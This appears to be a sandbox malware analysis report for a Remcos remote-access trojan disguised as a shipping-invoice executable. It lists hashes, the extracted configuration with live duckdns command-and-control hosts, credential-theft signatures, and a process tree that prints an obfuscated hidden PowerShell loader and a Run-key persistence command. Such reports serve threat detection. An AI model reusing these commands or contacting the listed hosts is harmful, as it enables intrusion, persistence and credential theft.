Overview

overview

10

Static

static

3

Awb_Tracki...00.exe

windows7-x64

8

Awb_Tracki...00.exe

windows10-2004-x64

10

Dumperfrer...es.ps1

windows7-x64

3

Dumperfrer...es.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2024 00:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Awb_Tracking_App_original_invoice_bl_packinglist_shipment_29_09_2024_00000000000000000000.exe

  • Size

    637KB

  • MD5

    ff4eb87d1d1b7be863e3d3ebacabd016

  • SHA1

    d87f89c5bcc66d4861b8d4654cac9b5f50dda1d4

  • SHA256

    c427e3abb88e7f09b05e5bdf03a1b7e4a8dd938d22d310556f12f2a54d880da0

  • SHA512

    53ea12baf38f793011bdb026cbfda1c510b199e8a137537d82449939426c1b4748764bf050fff61aca89760d398f783a63a6c5478464584014e66fd8083ab558

  • SSDEEP

    12288:zNiR660vPkyuY/J/ptZA9h7z13KXGWj4XXdN6+:xu0Hkg/lLSlrWj4Xn6+

Score
10/10
remcosgimmewealthcollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

GIMMEWEALTH

C2

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

janbours92harbu007.duckdns.org:3981
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-DZYYYQ

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 7 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Awb_Tracking_App_original_invoice_bl_packinglist_shipment_29_09_2024_00000000000000000000.exe
    "C:\Users\Admin\AppData\Local\Temp\Awb_Tracking_App_original_invoice_bl_packinglist_shipment_29_09_2024_00000000000000000000.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Nonrealizations=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\disconformity\workbench\perinephria\Dumperfrernes\Multiversities.Bek';$Shrite=$Nonrealizations.SubString(2892,3);.$Shrite($Nonrealizations) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        3⤵
          PID:1172
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\syswow64\msiexec.exe"
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:5100
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperventilate" /t REG_EXPAND_SZ /d "%Appet% -windowstyle 1 $kravls=(gp -Path 'HKCU:\Software\Hreapparater\').Logaritmes;%Appet% ($kravls)"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2096
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperventilate" /t REG_EXPAND_SZ /d "%Appet% -windowstyle 1 $kravls=(gp -Path 'HKCU:\Software\Hreapparater\').Logaritmes;%Appet% ($kravls)"
              5⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:1144
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tlzoyqkvkhts"
            4⤵
              PID:684
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tlzoyqkvkhts"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1940
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\efezrivxgplxynbz"
              4⤵
                PID:832
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\efezrivxgplxynbz"
                4⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:100
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ohkrrbgrtxdbjtpdxam"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3948

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1pyjzig.vl2.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\disconformity\workbench\perinephria\Dumperfrernes\Distale.Cia228
          Filesize

          300KB

          MD5

          eb9b1277f694813afcb20aa13bcf666c

          SHA1

          d83e252bc07bac01cb559df7f00269dce16e1990

          SHA256

          3b8d733962acda0bbffe82d282398eed4be9870256712db02be7e2ea55ca2dcc

          SHA512

          0bc9dcfe1338aa9bc2d5733d8076bb6b0fe4181479502059ed153c2400ff253ac81eb0982e9fcb969b8f50d38dafd440570eb310362bdd7098f6fd4f625627b5

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\disconformity\workbench\perinephria\Dumperfrernes\Multiversities.Bek
          Filesize

          52KB

          MD5

          9f75d1ca6c6a219e26ceea78a6f6b218

          SHA1

          688f14dea57c5989cdb6b29d2d2f5d6a07a460ef

          SHA256

          203ef2d3c9984cadb87801dc09f084acf7d6f078855ba6300c6e2da79d3a23e9

          SHA512

          a337e7288f0ed129ae27357914af9af67080835c2b15cc1000566b39f3a30756b2d9e17c910429ecdda936a0e91608ceffa75725e4f5ef3efb1bf9e6b5b6666e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\tlzoyqkvkhts
          Filesize

          4KB

          MD5

          05d209dc2e52f4877b0210319d699d7c

          SHA1

          f80b9ea3164019831fa0b5cffc864c0d496a002b

          SHA256

          278f3fd9076c23dc3d397375c5f586aa23b15c9e42b22139748e20f70f127160

          SHA512

          701f72884bf941ec3e60f6f8bb98c26743447c276de2d15ca27a406ccc6a39dafeef9a6f83264d52ebb93923af738fa7b16f617fb33dc54e5a7ed93b188aee9a

          Download Submit

        • memory/100-84-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/100-95-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/100-83-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/1940-86-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/1940-89-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/1940-87-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/1940-82-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/2516-51-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-58-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-26-0x0000000006B30000-0x0000000006B4A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2516-25-0x00000000077E0000-0x0000000007876000-memory.dmp

          Filesize

          600KB

          Download

        • memory/2516-27-0x0000000006B90000-0x0000000006BB2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2516-30-0x0000000008AA0000-0x000000000911A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2516-31-0x0000000007A60000-0x0000000007A92000-memory.dmp

          Filesize

          200KB

          Download

        • memory/2516-32-0x0000000070430000-0x000000007047C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2516-44-0x0000000007AA0000-0x0000000007ABE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2516-34-0x0000000070800000-0x0000000070B54000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2516-45-0x0000000007AD0000-0x0000000007B73000-memory.dmp

          Filesize

          652KB

          Download

        • memory/2516-33-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-46-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-47-0x0000000007BD0000-0x0000000007BDA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2516-48-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-50-0x0000000007D80000-0x0000000007DA4000-memory.dmp

          Filesize

          144KB

          Download

        • memory/2516-49-0x0000000007D50000-0x0000000007D7A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/2516-6-0x0000000073FAE000-0x0000000073FAF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2516-53-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-24-0x00000000066C0000-0x000000000670C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2516-55-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-56-0x0000000073FAE000-0x0000000073FAF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2516-57-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-28-0x0000000007E70000-0x0000000008414000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2516-59-0x0000000009120000-0x000000000DCD5000-memory.dmp

          Filesize

          75.7MB

          Download

        • memory/2516-60-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-61-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-62-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-64-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-7-0x0000000003050000-0x0000000003086000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2516-8-0x0000000073FA0000-0x0000000074750000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2516-9-0x00000000059C0000-0x0000000005FE8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/2516-10-0x00000000057A0000-0x00000000057C2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2516-23-0x0000000006610000-0x000000000662E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2516-22-0x0000000006060000-0x00000000063B4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2516-11-0x0000000005940000-0x00000000059A6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2516-12-0x0000000005FF0000-0x0000000006056000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3948-91-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/3948-90-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/3948-88-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/5100-77-0x0000000077B71000-0x0000000077C91000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/5100-73-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/5100-66-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

          Download

        • memory/5100-65-0x0000000077B71000-0x0000000077C91000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/5100-98-0x0000000022640000-0x0000000022659000-memory.dmp

          Filesize

          100KB

          Download

        • memory/5100-102-0x0000000022640000-0x0000000022659000-memory.dmp

          Filesize

          100KB

          Download

        • memory/5100-101-0x0000000022640000-0x0000000022659000-memory.dmp

          Filesize

          100KB

          Download